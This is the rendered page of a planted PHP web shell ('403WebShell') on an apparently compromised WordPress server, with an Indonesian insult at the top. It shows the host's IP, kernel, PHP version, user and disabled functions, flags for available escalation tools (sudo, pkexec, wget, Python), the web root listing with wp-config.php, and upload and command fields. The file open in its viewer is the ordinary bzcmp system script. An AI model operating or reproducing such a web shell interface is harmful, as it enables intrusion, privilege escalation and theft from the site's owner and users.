buyer kontol nego ga ngotak comecondo.com
 Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
 Apache/2.4.18 (Ubuntu)
 68.183.124.220
 Cant read /etc/named.conf
Name Type Size Owner/Group Permission Last Modified Actions
. dir - gavin/www-data drwxr-sr-x 2024-12-15 11:41:30
.. dir - root/root drwxr-xr-x 2019-08-25 02:29:45
.sucuriquarantine dir - root/www-data drwxr-sr-x 2024-05-24 05:31:33
home dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
worksheets dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-admin dir - gavin/www-data drwxr-sr-x 2025-08-29 03:10:31
wp-content dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-includes dir - gavin/www-data drwxr-sr-x 2021-06-27 11:01:30
.htaccess text/plain 201 B root/www-data -rw-r--r-- 2021-06-24 04:05:20
agent-contact-1.JPG image/jpeg 22.78 KB gavin/www-data -rw-rw-r-- 2022-01-31 05:13:10
circle-16.png image/png 268 B gavin/www-data -rw-rw-r-- 2021-01-11 04:23:00
index.html text/html 11.06 KB gavin/www-data -rw-r--r-- 2019-08-25 02:29:47
index.php text/x-php 420 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
license.txt text/plain 19.47 KB gavin/www-data -rw-r--r-- 2019-01-01 08:37:49
map.php text/html 1012 B gavin/www-data -rw-rw-r-- 2021-01-01 03:50:38
pin-8-16.png image/png 309 B gavin/www-data -rw-rw-r-- 2021-01-11 04:38:33
pin-8-24.png image/png 499 B gavin/www-data -rw-rw-r-- 2021-01-11 04:40:01
pin-blue-1.png image/png 28.16 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:10:36
pin-green-1.png image/png 12.71 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:23:52
pin-house-red-2.png image/png 1.36 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:18:10
pin-house-red-3.png image/png 2.49 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:20:50
readme.html text/html 7.27 KB gavin/www-data -rw-r--r-- 2019-04-08 10:59:56
wallpaper1.jpg image/jpeg 58.99 KB gavin/www-data -rw-rw-r-- 2022-01-29 05:15:06
wallpaper2.jpg image/jpeg 788.8 KB gavin/www-data -rw-rw-r-- 2022-02-01 11:27:14
wp-activate.php text/x-php 6.76 KB gavin/www-data -rw-r--r-- 2019-01-12 06:41:52
wp-blog-header.php text/x-php 369 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-comments-post.php text/x-php 2.23 KB gavin/www-data -rw-r--r-- 2019-01-21 01:34:51
wp-config-sample.php text/x-php 2.83 KB gavin/www-data -rw-r--r-- 2020-10-24 04:07:41
wp-config.php text/x-php 3.62 KB gavin/www-data -rw-r--r-- 2022-04-20 01:23:49
wp-cron.php text/x-php 3.76 KB gavin/www-data -rw-r--r-- 2019-01-09 08:37:51
wp-links-opml.php text/x-php 2.44 KB gavin/www-data -rw-r--r-- 2019-01-16 05:29:49
wp-load.php text/x-php 3.23 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-login.php text/x-php 38.62 KB gavin/www-data -rw-r--r-- 2019-06-10 01:34:45
wp-mail.php text/x-php 8.21 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-settings.php text/x-php 18.52 KB gavin/www-data -rw-r--r-- 2019-03-28 07:04:51
wp-signup.php text/x-php 30.36 KB gavin/www-data -rw-r--r-- 2019-01-16 04:51:52
wp-trackback.php text/x-php 4.65 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
xmlrpc.php text/x-php 3 KB gavin/www-data -rw-r--r-- 2018-08-17 01:51:36
© BlackDragon
403WebShell
403Webshell
Server IP : 68.183.124.220  /  Your IP : 216.73.216.228
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : gavin ( 1000)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bin/bzcmp
#!/bin/sh
# sh is buggy on RS/6000 AIX 3.2. Replace above line with #!/bin/ksh

# Bzcmp/diff wrapped for bzip2, 
# adapted from zdiff by Philippe Troin <phil@fifi.org> for Debian GNU/Linux.

# Bzcmp and bzdiff are used to invoke the cmp or the  diff  pro-
# gram  on compressed files.  All options specified are passed
# directly to cmp or diff.  If only 1 file is specified,  then
# the  files  compared  are file1 and an uncompressed file1.gz.
# If two files are specified, then they are  uncompressed  (if
# necessary) and fed to cmp or diff.  The exit status from cmp
# or diff is preserved.

PATH="/usr/bin:/bin:$PATH"; export PATH
prog=`echo $0 | sed 's|.*/||'`
case "$prog" in
  *cmp) comp=${CMP-cmp}   ;;
  *)    comp=${DIFF-diff} ;;
esac

OPTIONS=
FILES=
for ARG
do
    case "$ARG" in
    -*)	OPTIONS="$OPTIONS $ARG";;
     *)	if test -f "$ARG"; then
            FILES="$FILES $ARG"
        else
            echo "${prog}: $ARG not found or not a regular file"
	    exit 1
        fi ;;
    esac
done
if test -z "$FILES"; then
	echo "Usage: $prog [${comp}_options] file [file]"
	exit 1
fi
set $FILES
if test $# -eq 1; then
	FILE=`echo "$1" | sed 's/.bz2$//'`
	bzip2 -cd "$FILE.bz2" | $comp $OPTIONS - "$FILE"
	STAT="$?"

elif test $# -eq 2; then
	case "$1" in
        *.bz2)
                case "$2" in
	        *.bz2)
			F=`echo "$2" | sed 's|.*/||;s|.bz2$||'`
			tmp=`mktemp "${TMPDIR:-/tmp}"/bzdiff.XXXXXXXXXX` || {
			      echo 'cannot create a temporary file' >&2
			      exit 1
			}
                        bzip2 -cdfq "$2" > "$tmp"
                        bzip2 -cdfq "$1" | $comp $OPTIONS - "$tmp"
                        STAT="$?"
			/bin/rm -f "$tmp";;

                *)      bzip2 -cdfq "$1" | $comp $OPTIONS - "$2"
                        STAT="$?";;
                esac;;
        *)      case "$2" in
	        *.bz2)
                        bzip2 -cdfq "$2" | $comp $OPTIONS "$1" -
                        STAT="$?";;
                *)      $comp $OPTIONS "$1" "$2"
                        STAT="$?";;
                esac;;
	esac
else
	echo "Usage: $prog [${comp}_options] file [file]"
	exit 1
fi
exit "$STAT"

Youez - 2016 - github.com/yon3zu
LinuXploit